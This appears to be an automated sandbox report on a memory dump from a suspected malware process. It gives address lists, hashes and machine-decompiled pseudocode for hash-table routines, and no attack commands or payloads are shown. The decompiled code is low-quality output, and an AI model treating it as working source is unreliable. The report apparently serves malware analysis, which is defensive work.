0x00c99b1b
0x00c99b1b
0x00c99b1e
0x00000000
0x00c99b1e
0x00c99a16
0x00c99a1a
0x00c99a1e
0x00c99a22
0x00c99a25
0x00c99a29
0x00c99a2d
0x00c99a30
0x00000000
0x00000000
0x00c99a32
0x00c99a35
0x00000000
0x00c99905
0x00c99936
0x00c9993c
0x00c99946
0x00c99949
0x00c9994b
0x00c9994d
0x00c99954
0x00c99954
0x00c99954
0x00c99954
0x00c9993e
0x00c9993e
0x00c99941
0x00c99941
0x00c99956
0x00c9995b
0x00c99960
0x00c999c5
0x00000000
0x00c999c5
0x00c99962
0x00c99969
0x00c9996c
0x00c9996f
0x00c99972
0x00c99972
0x00c99976
0x00000000
0x00000000
0x00c99978
0x00c9997e
0x00c9999e
0x00c999ae
0x00000000
0x00000000
0x00c999b0
0x00c999b2
0x00c99b20
0x00c99b20
0x00c99b22
0x00c99b2a
0x00c99b38
0x00c99b38
0x00c99983
0x00c9998a
0x00c9998d
0x00c9998f
0x00c99993
0x00c99993
0x00c99993
0x00c99995
0x00c99995
0x00c99985
0x00c99985
0x00c99985
0x00c9999c
0x00000000
0x00000000
0x00000000
0x00000000
0x00c9999c
0x00c999ba
0x00c999bd
0x00c999c0
0x00000000
0x00c999c0

APIs

__floor_pentium4.LIBCMT ref: 00C99A4D

Strings

3333, xrefs: 00C99913

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: __floor_pentium4
String ID: 3333
API String ID: 4168288129-2924271548
Opcode ID: 5621eb81ea0e78ef47b7084f93e934fc7b968544da841594b682f863aa348828
Instruction ID: 036183a79d3058047b7310992a368906adc88f3917b2d0d070347872bae72f53
Opcode Fuzzy Hash: 5621eb81ea0e78ef47b7084f93e934fc7b968544da841594b682f863aa348828
Instruction Fuzzy Hash: 81819071B006098BCF14CF6AD8849ADF7B2FF99300719C62DE819BB305DB35AD518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C991F0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 66%

			E00C991F0(unsigned int __ecx, void* __eflags, intOrPtr __fp0, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v20;
				signed int _v32;
				signed int _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				signed int _t102;
				signed int _t104;
				signed int _t105;
				signed int _t108;
				signed int _t113;
				signed int _t117;
				signed int _t121;
				signed int _t127;
				signed int _t128;
				intOrPtr* _t129;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				signed int* _t140;
				unsigned int _t153;
				signed int _t156;
				intOrPtr* _t158;
				signed int _t162;
				signed int _t163;
				signed int _t166;
				signed int _t175;
				signed int _t176;
				signed int* _t177;
				unsigned int _t180;
				signed int _t183;
				intOrPtr _t198;

				_t198 = __fp0;
				_t180 = __ecx;
				_t90 =  *0xd40014; // 0xfbddd969
				_v20 = _t90 ^ _t183;
				_v36 = E00C96AF8(_a8);
				_t127 =  *(_t180 + 4);
				_t133 = 0xffffffffffffffff;
				_t175 = 0xffffffffffffffff;
				if(_t127 == 0) {
					L19:
					_t158 =  &_v32;
					 *((intOrPtr*)(_t158 + 8)) = _t133;
					 *((intOrPtr*)(_t158 + 4)) = _t133;
					 *_t158 = _t133;
					_t134 = _t180;
					E00C99448(_t134, _t198, _t158, _v36, _a12);
					asm("movq xmm2, [0xd30dd0]");
					asm("movd xmm0, eax");
					asm("por xmm0, xmm2");
					asm("subsd xmm0, xmm2");
					asm("cvtsd2ss xmm0, xmm0");
					asm("movss xmm1, [esi+0x10]");
					__eflags = _t127;
					if(__eflags == 0) {
						L21:
						asm("divss xmm0, xmm1");
						asm("cvtss2sd xmm0, xmm0");
						asm("movsd [esp], xmm0");
						_t97 = E00D236A0(_t134);
						_v56 = _t198;
						asm("movss xmm0, [ebp-0x34]");
						asm("cvttss2si ecx, xmm0");
						asm("subss xmm0, [0xd30dd8]");
						asm("cvttss2si eax, xmm0");
						_t99 = _t97 & _t134 >> 0x0000001f | _t134;
						_t135 = _t127 + _t127;
						__eflags = _t127 - 3;
						if(_t127 < 3) {
							_t162 = 1;
							__eflags = 1;
						} else {
							_v40 = _t180;
							__eflags = _t127 & _t127 - 0x00000001;
							_t180 = _v40;
							_t162 = 0 | (_t127 & _t127 - 0x00000001) != 0x00000000;
						}
						_t163 = _t162 | _t135;
						__eflags = _t163 - _t99;
						_t164 =  <=  ? _t99 : _t163;
						E00C994B2(_t180, _t198,  <=  ? _t99 : _t163);
						_t127 =  *(_t180 + 4);
						_t176 = _t127 - 1;
						__eflags = _t127 & _t176;
						if((_t127 & _t176) != 0) {
							_t175 = _v36;
							__eflags = _t175 - _t127;
							if(_t175 >= _t127) {
								_t59 = _t175 % _t127;
								__eflags = _t59;
								_t175 = _t59;
							}
						} else {
							_t175 = _t176 & _v36;
						}
						L28:
						_t102 =  *( *_t180 + _t175 * 4);
						__eflags = _t102;
						if(_t102 == 0) {
							_t165 = _v32;
							 *_v32 =  *(_t180 + 8);
							 *(_t180 + 8) = _v32;
							 *( *_t180 + _t175 * 4) = _t180 + 8;
							_t140 = _v32;
							_t104 =  *_t140;
							__eflags = _t104;
							if(_t104 != 0) {
								_t108 =  *(_t104 + 4);
								_t166 = _t127 - 1;
								__eflags = _t127 & _t166;
								if((_t127 & _t166) != 0) {
									__eflags = _t108 - _t127;
									if(_t108 >= _t127) {
										_t79 = _t108 % _t127;
										__eflags = _t79;
										_t108 = _t79;
									}
								} else {
									_t108 = _t108 & _t166;
								}
								_t165 =  *_t180;
								 *( *_t180 + _t108 * 4) = _t140;
							}
						} else {
							_t165 = _v32;
							 *_v32 =  *_t102;
							 *_t102 = _v32;
						}
						_t128 = _v32;
						_t85 = _t180 + 0xc;
						 *_t85 =  *(_t180 + 0xc) + 1;
						__eflags =  *_t85;
						_t105 = 1;
						goto L37;
					}
					asm("movd xmm3, ebx");
					asm("por xmm3, xmm2");
					asm("subsd xmm3, xmm2");
					asm("xorps xmm2, xmm2");
					asm("cvtsd2ss xmm2, xmm3");
					asm("mulss xmm2, xmm1");
					asm("ucomiss xmm0, xmm2");
					if(__eflags <= 0) {
						goto L28;
					}
					goto L21;
				} else {
					_v40 = _t180;
					_t113 = _t127 - (_t127 >> 0x00000001 & 0x55555555);
					_t165 = _t113 & 0x33333333;
					_t180 = (((_t113 >> 0x00000002 & 0x33333333) + (_t113 & 0x33333333) >> 0x00000004) + (_t113 >> 0x00000002 & 0x33333333) + (_t113 & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
					if(_t180 > 1) {
						_t117 = _v36;
						_t175 = _t117;
						__eflags = _t117 - _t127;
						if(_t117 >= _t127) {
							_t11 = _v36 % _t127;
							__eflags = _t11;
							_t165 = _t11;
							_t175 = _t11;
						}
					} else {
						_t175 = _t127 - 0x00000001 & _v36;
					}
					_v44 = _t127;
					_t153 = _v40;
					_t129 =  *((intOrPtr*)( *_t153 + _t175 * 4));
					if(_t129 == 0) {
						_t180 = _t153;
						_t127 = _v44;
						L18:
						_t133 = 0xffffffffffffffff;
						__eflags = 0xffffffffffffffff;
						goto L19;
					}
					_v48 = _t175;
					_v52 = _v44 - 1;
					while(1) {
						_t129 =  *_t129;
						if(_t129 == 0) {
							break;
						}
						_t121 =  *(_t129 + 4);
						if(_t121 == _v36) {
							L14:
							if(L00C96B8C(_t129 + 8, _a8) == 0) {
								continue;
							}
							_t105 = 0;
							L37:
							_t177 = _a4;
							 *_t177 = _t128;
							_t177[1] = _t105;
							E00CFE643(_t105, _t128, _v20 ^ _t183, _t165, _t177, _t180);
							return _t177;
						}
						if(_t180 > 1) {
							_t156 = _v44;
							__eflags = _t121 - _t156;
							if(_t121 >= _t156) {
								_t27 = _t121 % _t156;
								__eflags = _t27;
								_t165 = _t27;
								_t121 = _t27;
							}
						} else {
							_t121 = _t121 & _v52;
						}
						if(_t121 != _v48) {
							break;
						} else {
							goto L14;
						}
					}
					_t180 = _v40;
					_t127 = _v44;
					_t175 = _v48;
					goto L18;
				}
			}

0x00c991f0
0x00c991f9
0x00c991fb
0x00c99202
0x00c99210
0x00c99213
0x00c99218
0x00c99219
0x00c9921d
0x00c992ed
0x00c992f0
0x00c992f3
0x00c992f6
0x00c992f9
0x00c992fb
0x00c99302
0x00c9930b
0x00c99313
0x00c99317
0x00c9931b
0x00c9931f
0x00c99323
0x00c99328
0x00c9932a
0x00c9934c
0x00c9934c
0x00c99350
0x00c99357
0x00c9935c
0x00c99364
0x00c99367
0x00c9936c
0x00c99375
0x00c9937d
0x00c99383
0x00c99385
0x00c99388
0x00c9938b
0x00c993a1
0x00c993a1
0x00c9938d
0x00c9938d
0x00c99395
0x00c99397
0x00c9939a
0x00c9939a
0x00c993a2
0x00c993a4
0x00c993a6
0x00c993ac
0x00c993b1
0x00c993b4
0x00c993b7
0x00c993b9
0x00c993c0
0x00c993c3
0x00c993c5
0x00c993cb
0x00c993cb
0x00c993cd
0x00c993cd
0x00c993bb
0x00c993bb
0x00c993bb
0x00c993cf
0x00c993d1
0x00c993d4
0x00c993d6
0x00c993ec
0x00c993ef
0x00c993f4
0x00c993f9
0x00c993fc
0x00c993ff
0x00c99401
0x00c99403
0x00c99405
0x00c99408
0x00c9940b
0x00c9940d
0x00c99413
0x00c99415
0x00c99419
0x00c99419
0x00c9941b
0x00c9941b
0x00c9940f
0x00c9940f
0x00c9940f
0x00c9941d
0x00c9941f
0x00c9941f
0x00c993d8
0x00c993da
0x00c993dd
0x00c993e2
0x00c993e2
0x00c99422
0x00c99425
0x00c99425
0x00c99425
0x00c99428
0x00000000
0x00c99428
0x00c9932c
0x00c99330
0x00c99334
0x00c99338
0x00c9933b
0x00c9933f
0x00c99343
0x00c99346
0x00000000
0x00000000
0x00000000
0x00c99223
0x00c99223
0x00c99232
0x00c9923b
0x00c99257
0x00c9925d
0x00c99267
0x00c9926a
0x00c9926c
0x00c9926e
0x00c99275
0x00c99275
0x00c99275
0x00c99277
0x00c99277
0x00c9925f
0x00c99262
0x00c99262
0x00c99279
0x00c9927c
0x00c99281
0x00c99286
0x00c992e5
0x00c992e7
0x00c992ea
0x00c992ec
0x00c992ec
0x00000000
0x00c992ec
0x00c99288
0x00c9928f
0x00c99295
0x00c99295
0x00c99299
0x00000000
0x00000000
0x00c9929b
0x00c992a1
0x00c992c1
0x00c992d1
0x00000000
0x00000000
0x00c992d3
0x00c9942a
0x00c9942a
0x00c9942d
0x00c9942f
0x00c99437
0x00c99445
0x00c99445
0x00c992a6
0x00c992ad
0x00c992b0
0x00c992b2
0x00c992b6
0x00c992b6
0x00c992b6
0x00c992b8
0x00c992b8
0x00c992a8
0x00c992a8
0x00c992a8
0x00c992bf
0x00000000
0x00000000
0x00000000
0x00000000
0x00c992bf
0x00c992da
0x00c992dd
0x00c992e0
0x00000000
0x00c992e0

APIs

__floor_pentium4.LIBCMT ref: 00C9935C

Strings

3333, xrefs: 00C99234

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: __floor_pentium4
String ID: 3333
API String ID: 4168288129-2924271548
Opcode ID: 5a716e04ac3695ac4fb877dcbc2fc9e146ced1212afb9bfa2a0b998222fe3c19
Instruction ID: 03d13e9aeb74b02ccaa943de658ebf31bc4d504aef2f956bb0bb6c4d97e15c3b
Opcode Fuzzy Hash: 5a716e04ac3695ac4fb877dcbc2fc9e146ced1212afb9bfa2a0b998222fe3c19
Instruction Fuzzy Hash: 34819F71A046098BCF19CFAAD8849ADF7F6FF9D310718862DE816BB351D731AD418B60

Uniqueness

Uniqueness Score: -1.00%

Function 00CBE4D0 Relevance: 3.4, APIs: 2, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f82d6a4d2cced14da12ca6d889178d3cf93cba6e9da8bfc7f50efb1ec01b73c
Instruction ID: 0e0ce11ad1ca6e60a7ddb620ad83e9edf2bd455155907ea19ebbab4eaba49cf1
Opcode Fuzzy Hash: 8f82d6a4d2cced14da12ca6d889178d3cf93cba6e9da8bfc7f50efb1ec01b73c
Instruction Fuzzy Hash: C6D1D371A106198BCB19CF69C4906EEF7B2AF95710F18862DE826EB350E731E945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CF1660 Relevance: 3.3, APIs: 2, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adf7e7305ab5ff45284f1676e63916a0cf3f1c9684192a6191d34cd35cb7cc2b
Instruction ID: 8fbbd5825204010483e4e87852b337bfc0df73ed36d7aa839b12546d51cbdcb8
Opcode Fuzzy Hash: adf7e7305ab5ff45284f1676e63916a0cf3f1c9684192a6191d34cd35cb7cc2b
Instruction Fuzzy Hash: 1CC1A131B1060ACFCB49CF69C89057EF7B2BF99350B1DC62AD916EB250D731E9418B92

Uniqueness

Uniqueness Score: -1.00%

Function 00CBD920 Relevance: 3.3, APIs: 2, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c45c75a224c64daaa645f1fca4c9b22db6cae11c6194940642d7dced12c59eb4
Instruction ID: 3a58b129493df0a95872add2db994a65929bda7428714b9eb7032f301c7602c9
Opcode Fuzzy Hash: c45c75a224c64daaa645f1fca4c9b22db6cae11c6194940642d7dced12c59eb4
Instruction Fuzzy Hash: C2B19371A146158FCB15CF69C4806AEF7B2FF99310B19C669D816EB340E731ED82CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CD6340 Relevance: 3.3, APIs: 2, Instructions: 288COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00CD64F3
__floor_pentium4.LIBCMT ref: 00CD6591

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: 68b7050216fc2f5faeb1e0bf03d1da31bd1fb53d2e92e863252edf119c712648
Instruction ID: e7a37019a5a56bf2367a82eabaac4229b0d8080f67bd86f9657abcfca111cf51
Opcode Fuzzy Hash: 68b7050216fc2f5faeb1e0bf03d1da31bd1fb53d2e92e863252edf119c712648
Instruction Fuzzy Hash: FDB1C471A146158FCB19CF29C48166EF7F2BF98310B18C62AE956E7344E731ED81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CEB350 Relevance: 3.3, APIs: 2, Instructions: 284
COMMONCrypto

Download Yara Rule

C-Code - Quality: 22%

			E00CEB350(intOrPtr* __ecx, intOrPtr __fp0, signed int** _a4, signed int* _a8, signed int** _a16) {
				intOrPtr* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int* _t99;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				signed int _t108;
				signed int _t111;
				signed int _t114;
				signed int _t116;
				signed int* _t117;
				signed int* _t118;
				signed int _t120;
				signed int _t124;
				signed int _t126;
				signed int _t138;
				unsigned int _t142;
				signed int* _t143;
				signed int** _t144;
				signed int _t146;
				signed int _t148;
				signed int _t152;
				signed int _t161;
				signed int _t164;
				signed int _t176;
				signed int _t177;
				signed int _t179;
				signed int _t202;
				signed int _t203;
				signed int _t209;
				unsigned int _t210;
				unsigned int _t212;
				signed int _t213;
				intOrPtr* _t214;
				signed int _t215;
				signed int _t216;
				signed int** _t217;
				signed int* _t218;
				signed int* _t219;
				intOrPtr _t230;

				_t230 = __fp0;
				_v20 = __ecx;
				_t213 =  *_a8;
				_v24 = (((_t213 * 0x5bd1e995 >> 0x00000018 ^ _t213 * 0x5bd1e995) * 0x5bd1e995 ^ 0x6f47a654) >> 0x0000000d ^ (_t213 * 0x5bd1e995 >> 0x00000018 ^ _t213 * 0x5bd1e995) * 0x5bd1e995 ^ 0x6f47a654) * 0x5bd1e995 >> 0x0000000f ^ (((_t213 * 0x5bd1e995 >> 0x00000018 ^ _t213 * 0x5bd1e995) * 0x5bd1e995 ^ 0x6f47a654) >> 0x0000000d ^ (_t213 * 0x5bd1e995 >> 0x00000018 ^ _t213 * 0x5bd1e995) * 0x5bd1e995 ^ 0x6f47a654) * 0x5bd1e995;
				_t142 =  *(__ecx + 4);
				_v28 = _t142;
				if(_t142 == 0) {
					_v36 = 0xffffffff;
					L16:
					_t214 = _v20;
					_t146 = _t214 + 0xc;
					 *_t218 = 1;
					_v32 = _t146;
					_t99 = L00CEAE40(_t146, _t230);
					_t219 = _t218 - 4;
					_t143 = _t99;
					_t143[2] =  *( *_a16);
					_t143[3] = 0;
					_t143[4] = 0;
					_t143[5] = 0;
					_t143[1] = _v24;
					 *_t143 = 0;
					asm("movq xmm2, [0xd30dd0]");
					asm("movd xmm0, eax");
					asm("por xmm0, xmm2");
					asm("subsd xmm0, xmm2");
					asm("cvtsd2ss xmm0, xmm0");
					asm("movss xmm1, [esi+0x10]");
					_t209 = _v28;
					__eflags = _t209;
					if(__eflags == 0) {
						L19:
						asm("divss xmm0, xmm1");
						asm("cvtss2sd xmm0, xmm0");
						asm("movsd [esp], xmm0");
						_t215 = _t209;
						_t105 = E00D236A0(_t146);
						_v44 = _t230;
						asm("movss xmm0, [ebp-0x28]");
						asm("cvttss2si eax, xmm0");
						asm("subss xmm0, [0xd30dd8]");
						asm("cvttss2si ecx, xmm0");
						_t148 = _t146 & _t105 >> 0x0000001f | _t105;
						_t176 = _t209 + _t209;
						_t106 = 1;
						__eflags = _t209 - 3;
						if(_t209 >= 3) {
							_t209 = _t215 - 1;
							__eflags = _t215 & _t209;
							_t53 = (_t215 & _t209) != 0;
							__eflags = _t53;
							_t106 = 0 | _t53;
						}
						_t107 = _t106 | _t176;
						__eflags = _t107 - _t148;
						_t108 =  <=  ? _t148 : _t107;
						_t216 = 2;
						__eflags = _t108 - 1;
						if(_t108 != 1) {
							_t54 = _t108 - 1; // 0x0
							_t148 = _t54;
							__eflags = _t108 & _t148;
							if((_t108 & _t148) != 0) {
								 *_t219 = _t108;
								_t108 = E00C9A3AC(_t143, _t209);
							}
							_t216 = _t108;
						}
						_t210 =  *(_v20 + 4);
						__eflags = _t216 - _t210;
						if(__eflags > 0) {
							L34:
							 *_t219 = _t216;
							E00CEA2C0(_v20);
							goto L35;
						} else {
							if(__eflags >= 0) {
								L35:
								_t214 = _v20;
								_t209 =  *(_t214 + 4);
								_t177 = _t209 - 1;
								__eflags = _t209 & _t177;
								if((_t209 & _t177) != 0) {
									_t111 = _v24;
									__eflags = _t111 - _t209;
									if(_t111 >= _t209) {
										_t71 = _t111 % _t209;
										__eflags = _t71;
										_t179 = _t71;
									} else {
										_t179 = _t111;
									}
								} else {
									_t179 = _t177 & _v24;
								}
								L40:
								_t114 =  *( *_t214 + _t179 * 4);
								__eflags = _t114;
								if(_t114 == 0) {
									_t77 = _t214 + 8; // 0x8
									 *_t143 =  *(_t214 + 8);
									 *(_t214 + 8) = _t143;
									 *( *_t214 + _t179 * 4) = _t77;
									_t116 =  *_t143;
									__eflags = _t116;
									_t217 = _a4;
									if(_t116 == 0) {
										L49:
										_t117 = _v32;
										 *_t117 =  *_t117 + 1;
										__eflags =  *_t117;
										_t118 = 1;
										L50:
										 *_t217 = _t143;
										_t217[1] = _t118;
										return _t217;
									}
									_t120 =  *(_t116 + 4);
									_t152 = _t209 - 1;
									__eflags = _t209 & _t152;
									if((_t209 & _t152) != 0) {
										__eflags = _t120 - _t209;
										if(_t120 >= _t209) {
											_t88 = _t120 % _t209;
											__eflags = _t88;
											_t120 = _t88;
										}
									} else {
										_t120 = _t120 & _t152;
									}
									_t114 = (_t120 << 2) +  *_v20;
									__eflags = _t114;
									L48:
									 *_t114 = _t143;
									goto L49;
								}
								 *_t143 =  *_t114;
								_t217 = _a4;
								goto L48;
							}
							asm("movss xmm0, [eax+0xc]");
							asm("orpd xmm0, [0xd30de0]");
							asm("subsd xmm0, [0xd30dd0]");
							asm("cvtsd2ss xmm0, xmm0");
							asm("divss xmm0, [eax+0x10]");
							asm("cvtss2sd xmm0, xmm0");
							asm("movsd [esp], xmm0");
							_t124 = E00D236A0(_t148);
							_v40 = _t230;
							asm("movss xmm0, [ebp-0x24]");
							asm("cvttss2si ecx, xmm0");
							asm("subss xmm0, [0xd30dd8]");
							asm("cvttss2si eax, xmm0");
							_t126 = _t124 & _t148 >> 0x0000001f | _t148;
							__eflags = _t210 - 3;
							if(_t210 < 3) {
								L32:
								 *_t219 = _t126;
								_t126 = E00C9A3AC(_t143, _t210);
								L33:
								__eflags = _t216 - _t126;
								_t216 =  <=  ? _t126 : _t216;
								__eflags = _t216 - _t210;
								if(_t216 >= _t210) {
									goto L35;
								}
								goto L34;
							}
							_t161 = (((_t210 - (_t210 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t210 - (_t210 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t210 - (_t210 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t210 - (_t210 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
							__eflags = _t161 - 1;
							if(_t161 > 1) {
								goto L32;
							}
							__eflags = _t126 - 2;
							if(_t126 >= 2) {
								asm("bsr ecx, eax");
								_t126 = 1 <<  ~(_t161 ^ 0x0000001f);
							}
							goto L33;
						}
					}
					asm("movd xmm3, edi");
					asm("por xmm3, xmm2");
					asm("subsd xmm3, xmm2");
					asm("xorps xmm2, xmm2");
					asm("cvtsd2ss xmm2, xmm3");
					asm("mulss xmm2, xmm1");
					asm("ucomiss xmm0, xmm2");
					if(__eflags > 0) {
						goto L19;
					}
					_t179 = _v36;
					goto L40;
				}
				_t212 = (((_t142 - (_t142 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t142 - (_t142 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t142 - (_t142 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t142 - (_t142 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
				if(_t212 > 1) {
					_t164 = _v24;
					_t202 = _t164;
					__eflags = _t164 - _t142;
					if(_t164 >= _t142) {
						_t12 = _t164 % _v28;
						__eflags = _t12;
						_t202 = _t12;
					}
				} else {
					_t164 = _v24;
					_t202 = _t142 - 0x00000001 & _t164;
				}
				_v36 = _t202;
				_t144 =  *( *_v20 + _t202 * 4);
				if(_t144 == 0) {
					goto L16;
				}
				_t203 = _v28;
				_v32 = _t203 - 1;
				while(1) {
					_t143 =  *_t144;
					if(_t143 == 0) {
						goto L16;
					}
					_t138 = _t143[1];
					if(_t138 == _t164) {
						L10:
						if(_t143[2] == _t213) {
							_t118 = 0;
							_t217 = _a4;
							goto L50;
						}
						continue;
					}
					if(_t212 <= 1) {
						_t138 = _t138 & _v32;
						__eflags = _t138;
					} else {
						if(_t138 >= _t203) {
							_t138 = _t138 % _v28;
							_t203 = _v28;
						}
					}
					if(_t138 != _v36) {
						goto L16;
					} else {
						goto L10;
					}
				}
				goto L16;
			}

0x00ceb350
0x00ceb359
0x00ceb35f
0x00ceb38d
0x00ceb390
0x00ceb395
0x00ceb398
0x00ceb3df
0x00ceb453
0x00ceb456
0x00ceb459
0x00ceb45c
0x00ceb463
0x00ceb466
0x00ceb46b
0x00ceb46e
0x00ceb474
0x00ceb477
0x00ceb47e
0x00ceb485
0x00ceb48f
0x00ceb492
0x00ceb49c
0x00ceb4a4
0x00ceb4a8
0x00ceb4ac
0x00ceb4b0
